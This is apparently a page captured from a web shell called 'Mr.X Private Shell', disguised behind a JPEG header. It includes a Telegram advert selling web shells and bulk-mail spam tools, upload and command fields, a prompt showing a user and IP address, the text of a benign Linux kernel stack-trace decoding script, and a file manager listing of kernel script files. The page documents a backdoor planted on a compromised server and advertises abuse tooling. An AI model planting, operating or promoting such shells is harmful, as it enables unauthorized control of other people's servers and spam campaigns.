����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
#!/usr/bin/bash
# SPDX-License-Identifier: GPL-2.0
# (c) 2014, Sasha Levin <sasha.levin@oracle.com>
#set -x

usage() {
	echo "Usage:"
	echo "	$0 -r <release> | <vmlinux> [<base path>|auto] [<modules path>]"
}

if [[ $1 == "-r" ]] ; then
	vmlinux=""
	basepath="auto"
	modpath=""
	release=$2

	for fn in {,/usr/lib/debug}/boot/vmlinux-$release{,.debug} /lib/modules/$release{,/build}/vmlinux ; do
		if [ -e "$fn" ] ; then
			vmlinux=$fn
			break
		fi
	done

	if [[ $vmlinux == "" ]] ; then
		echo "ERROR! vmlinux image for release $release is not found" >&2
		usage
		exit 2
	fi
else
	vmlinux=$1
	basepath=${2-auto}
	modpath=$3
	release=""
	debuginfod=

	# Can we use debuginfod-find?
	if type debuginfod-find >/dev/null 2>&1 ; then
		debuginfod=${1-only}
	fi

	if [[ $vmlinux == "" && -z $debuginfod ]] ; then
		echo "ERROR! vmlinux image must be specified" >&2
		usage
		exit 1
	fi
fi

declare -A cache
declare -A modcache

find_module() {
	if [[ -n $debuginfod ]] ; then
		if [[ -n $modbuildid ]] ; then
			debuginfod-find debuginfo $modbuildid && return
		fi

		# Only using debuginfod so don't try to find vmlinux module path
		if [[ $debuginfod == "only" ]] ; then
			return
		fi
	fi

	if [[ "$modpath" != "" ]] ; then
		for fn in $(find "$modpath" -name "${module//_/[-_]}.ko*") ; do
			if readelf -WS "$fn" | grep -qwF .debug_line ; then
				echo $fn
				return
			fi
		done
		return 1
	fi

	modpath=$(dirname "$vmlinux")
	find_module && return

	if [[ $release == "" ]] ; then
		release=$(gdb -ex 'print init_uts_ns.name.release' -ex 'quit' -quiet -batch "$vmlinux" 2>/dev/null | sed -n 's/\$1 = "\(.*\)".*/\1/p')
	fi

	for dn in {/usr/lib/debug,}/lib/modules/$release ; do
		if [ -e "$dn" ] ; then
			modpath="$dn"
			find_module && return
		fi
	done

	modpath=""
	return 1
}

parse_symbol() {
	# The structure of symbol at this point is:
	#   ([name]+[offset]/[total length])
	#
	# For example:
	#   do_basic_setup+0x9c/0xbf

	if [[ $module == "" ]] ; then
		local objfile=$vmlinux
	elif [[ "${modcache[$module]+isset}" == "isset" ]]; then
		local objfile=${modcache[$module]}
	else
		local objfile=$(find_module)
		if [[ $objfile == "" ]] ; then
			echo "WARNING! Modules path isn't set, but is needed to parse this symbol" >&2
			return
		fi
		modcache[$module]=$objfile
	fi

	# Remove the englobing parenthesis
	symbol=${symbol#\(}
	symbol=${symbol%\)}

	# Strip segment
	local segment
	if [[ $symbol == *:* ]] ; then
		segment=${symbol%%:*}:
		symbol=${symbol#*:}
	fi

	# Strip the symbol name so that we could look it up
	local name=${symbol%+*}

	# Use 'nm vmlinux' to figure out the base address of said symbol.
	# It's actually faster to call it every time than to load it
	# all into bash.
	if [[ "${cache[$module,$name]+isset}" == "isset" ]]; then
		local base_addr=${cache[$module,$name]}
	else
		local base_addr=$(nm "$objfile" 2>/dev/null | awk '$3 == "'$name'" && ($2 == "t" || $2 == "T") {print $1; exit}')
		if [[ $base_addr == "" ]] ; then
			# address not found
			return
		fi
		cache[$module,$name]="$base_addr"
	fi
	# Let's start doing the math to get the exact address into the
	# symbol. First, strip out the symbol total length.
	local expr=${symbol%/*}

	# Now, replace the symbol name with the base address we found
	# before.
	expr=${expr/$name/0x$base_addr}

	# Evaluate it to find the actual address
	expr=$((expr))
	local address=$(printf "%x\n" "$expr")

	# Pass it to addr2line to get filename and line number
	# Could get more than one result
	if [[ "${cache[$module,$address]+isset}" == "isset" ]]; then
		local code=${cache[$module,$address]}
	else
		local code=$(${CROSS_COMPILE}addr2line -i -e "$objfile" "$address" 2>/dev/null)
		cache[$module,$address]=$code
	fi

	# addr2line doesn't return a proper error code if it fails, so
	# we detect it using the value it prints so that we could preserve
	# the offset/size into the function and bail out
	if [[ $code == "??:0" ]]; then
		return
	fi

	# Strip out the base of the path on each line
	code=$(while read -r line; do echo "${line#$basepath/}"; done <<< "$code")

	# In the case of inlines, move everything to same line
	code=${code//$'\n'/' '}

	# Replace old address with pretty line numbers
	symbol="$segment$name ($code)"
}

debuginfod_get_vmlinux() {
	local vmlinux_buildid=${1##* }

	if [[ $vmlinux != "" ]]; then
		return
	fi

	if [[ $vmlinux_buildid =~ ^[0-9a-f]+ ]]; then
		vmlinux=$(debuginfod-find debuginfo $vmlinux_buildid)
		if [[ $? -ne 0 ]] ; then
			echo "ERROR! vmlinux image not found via debuginfod-find" >&2
			usage
			exit 2
		fi
		return
	fi
	echo "ERROR! Build ID for vmlinux not found. Try passing -r or specifying vmlinux" >&2
	usage
	exit 2
}

decode_code() {
	local scripts=`dirname "${BASH_SOURCE[0]}"`

	echo "$1" | $scripts/decodecode
}

handle_line() {
	if [[ $basepath == "auto" && $vmlinux != "" ]] ; then
		module=""
		symbol="kernel_init+0x0/0x0"
		parse_symbol
		basepath=${symbol#kernel_init (}
		basepath=${basepath%/init/main.c:*)}
	fi

	local words

	# Tokenize
	read -a words <<<"$1"

	# Remove hex numbers. Do it ourselves until it happens in the
	# kernel

	# We need to know the index of the last element before we
	# remove elements because arrays are sparse
	local last=$(( ${#words[@]} - 1 ))

	for i in "${!words[@]}"; do
		# Remove the address
		if [[ ${words[$i]} =~ \[\<([^]]+)\>\] ]]; then
			unset words[$i]
		fi

		# Format timestamps with tabs
		if [[ ${words[$i]} == \[ && ${words[$i+1]} == *\] ]]; then
			unset words[$i]
			words[$i+1]=$(printf "[%13s\n" "${words[$i+1]}")
		fi
	done

	if [[ ${words[$last]} =~ ^[0-9a-f]+\] ]]; then
		words[$last-1]="${words[$last-1]} ${words[$last]}"
		unset words[$last]
		last=$(( $last - 1 ))
	fi

	if [[ ${words[$last]} =~ \[([^]]+)\] ]]; then
		module=${words[$last]}
		module=${module#\[}
		module=${module%\]}
		modbuildid=${module#* }
		module=${module% *}
		if [[ $modbuildid == $module ]]; then
			modbuildid=
		fi
		symbol=${words[$last-1]}
		unset words[$last-1]
	else
		# The symbol is the last element, process it
		symbol=${words[$last]}
		module=
		modbuildid=
	fi

	unset words[$last]
	parse_symbol # modifies $symbol

	# Add up the line number to the symbol
	echo "${words[@]}" "$symbol $module"
}

while read line; do
	# Let's see if we have an address in the line
	if [[ $line =~ \[\<([^]]+)\>\] ]] ||
	   [[ $line =~ [^+\ ]+\+0x[0-9a-f]+/0x[0-9a-f]+ ]]; then
		# Translate address to line numbers
		handle_line "$line"
	# Is it a code line?
	elif [[ $line == *Code:* ]]; then
		decode_code "$line"
	# Is it a version line?
	elif [[ -n $debuginfod && $line =~ PID:\ [0-9]+\ Comm: ]]; then
		debuginfod_get_vmlinux "$line"
	else
		# Nothing special in this line, show it as is
		echo "$line"
	fi
done

Filemanager

Name Type Size Permission Actions
atomic Folder 0755
basic Folder 0755
clang-tools Folder 0755
coccinelle Folder 0755
dtc Folder 0755
dummy-tools Folder 0755
gcc-plugins Folder 0755
gdb Folder 0755
genksyms Folder 0755
include Folder 0755
kconfig Folder 0755
ksymoops Folder 0755
mod Folder 0755
package Folder 0755
selinux Folder 0755
Kbuild.include File 10.24 KB 0644
Kconfig.include File 2.56 KB 0644
Lindent File 506 B 0755
Makefile File 1.74 KB 0644
Makefile.asm-generic File 1.82 KB 0644
Makefile.btf File 1.07 KB 0644
Makefile.build File 17.1 KB 0644
Makefile.clean File 2.02 KB 0644
Makefile.compiler File 2.79 KB 0644
Makefile.dtbinst File 998 B 0644
Makefile.extrawarn File 3.25 KB 0644
Makefile.gcc-plugins File 2.57 KB 0644
Makefile.headersinst File 2.88 KB 0644
Makefile.host File 4.63 KB 0644
Makefile.kasan File 2.45 KB 0644
Makefile.kcov File 333 B 0644
Makefile.kcsan File 1004 B 0644
Makefile.kmsan File 208 B 0644
Makefile.lib File 21.16 KB 0644
Makefile.modfinal File 2.74 KB 0644
Makefile.modinst File 2.39 KB 0644
Makefile.modpost File 4.16 KB 0644
Makefile.package File 6.61 KB 0644
Makefile.randstruct File 410 B 0644
Makefile.ubsan File 837 B 0644
Makefile.userprogs File 1.57 KB 0644
Makefile.vmlinux File 890 B 0644
Makefile.vmlinux_o File 2.54 KB 0644
adjust_autoksyms.sh File 2.11 KB 0755
as-version.sh File 2.05 KB 0755
asn1_compiler File 30.13 KB 0755
asn1_compiler.c File 35.32 KB 0644
bin2c.c File 743 B 0644
bloat-o-meter File 3.36 KB 0755
bootgraph.pl File 5.64 KB 0755
bpf_doc.py File 31.73 KB 0755
cc-can-link.sh File 170 B 0755
cc-version.sh File 1.35 KB 0755
check-sysctl-docs File 4.37 KB 0755
check_extable.sh File 4.93 KB 0755
checkdeclares.pl File 1.1 KB 0644
checkincludes.pl File 1.94 KB 0755
checkkconfigsymbols.py File 15.88 KB 0755
checkpatch.pl File 224.16 KB 0755
checkstack.pl File 5.9 KB 0755
checksyscalls.sh File 7.34 KB 0755
checkversion.pl File 2.15 KB 0755
cleanfile File 3.46 KB 0755
cleanpatch File 5.06 KB 0755
coccicheck File 7.89 KB 0755
config File 4.67 KB 0755
const_structs.checkpatch File 1009 B 0644
decode_stacktrace.sh File 6.56 KB 0755
decodecode File 2.89 KB 0755
depmod.sh File 1.41 KB 0755
dev-needs.sh File 6.08 KB 0755
diffconfig File 4.12 KB 0755
documentation-file-ref-check File 5.6 KB 0755
export_report.pl File 4.49 KB 0755
extract-cert File 14.12 KB 0755
extract-cert.c File 3.63 KB 0644
extract-ikconfig File 1.7 KB 0755
extract-module-sig.pl File 3.65 KB 0755
extract-sys-certs.pl File 3.74 KB 0755
extract-vmlinux File 1.66 KB 0755
extract_xc3028.pl File 44.61 KB 0755
faddr2line File 6.16 KB 0755
file-size.sh File 90 B 0755
find-unused-docs.sh File 1.28 KB 0755
gcc-ld File 715 B 0755
gcc-x86_32-has-stack-protector.sh File 412 B 0755
gcc-x86_64-has-stack-protector.sh File 202 B 0755
gen_autoksyms.sh File 1.4 KB 0755
gen_ksymdeps.sh File 403 B 0755
gen_packed_field_checks.c File 1.19 KB 0644
generate_initcall_order.pl File 5.94 KB 0755
generate_rust_target.rs File 5.26 KB 0644
get_abi.pl File 15.09 KB 0755
get_dvb_firmware File 24.54 KB 0755
get_feat.pl File 14.34 KB 0755
get_maintainer.pl File 67.13 KB 0755
gfp-translate File 1.71 KB 0755
headerdep.pl File 3.5 KB 0755
headers_check.pl File 3.73 KB 0755
headers_install.sh File 3.17 KB 0755
insert-sys-cert.c File 8.87 KB 0644
install.sh File 990 B 0755
jobserver-exec File 2.16 KB 0755
kallsyms File 18.23 KB 0755
kallsyms.c File 20.38 KB 0644
kernel-doc File 66.32 KB 0755
ld-version.sh File 1.67 KB 0755
leaking_addresses.pl File 12.8 KB 0755
link-vmlinux.sh File 8.88 KB 0755
makelst File 812 B 0755
markup_oops.pl File 7.92 KB 0755
min-tool-version.sh File 473 B 0755
mkcompile_h File 2.59 KB 0755
mksysmap File 1.33 KB 0755
mkuboot.sh File 418 B 0755
module.lds File 432 B 0644
module.lds.S File 1.49 KB 0644
modules-check.sh File 431 B 0755
nsdeps File 1.63 KB 0644
objdiff File 2.83 KB 0755
objdump-func File 715 B 0755
pahole-version.sh File 273 B 0755
parse-maintainers.pl File 4.54 KB 0755
patch-kernel File 9.95 KB 0755
profile2linkerlist.pl File 410 B 0755
prune-kernel File 712 B 0755
recordmcount.c File 16.69 KB 0644
recordmcount.h File 19.37 KB 0644
recordmcount.pl File 17.61 KB 0755
remove-stale-files File 1.35 KB 0755
setlocalversion File 3.59 KB 0755
show_delta File 3.01 KB 0755
sign-file File 22.16 KB 0755
sign-file.c File 9.93 KB 0644
sorttable File 22.12 KB 0755
sorttable.c File 7.62 KB 0644
sorttable.h File 12.85 KB 0644
spdxcheck-test.sh File 323 B 0644
spelling.txt File 31.92 KB 0644
sphinx-pre-install File 24.29 KB 0755
split-man.pl File 600 B 0755
stackdelta File 1.84 KB 0755
stackusage File 798 B 0755
subarch.include File 641 B 0644
syscallhdr.sh File 1.89 KB 0755
syscallnr.sh File 1.45 KB 0644
syscalltbl.sh File 1.46 KB 0755
tags.sh File 9.66 KB 0755
test_fortify.sh File 2.23 KB 0644
tools-support-relr.sh File 550 B 0755
unifdef File 34.12 KB 0755
unifdef.c File 34.8 KB 0644
ver_linux File 2.59 KB 0755
xen-hypercalls.sh File 386 B 0644
xz_wrap.sh File 567 B 0755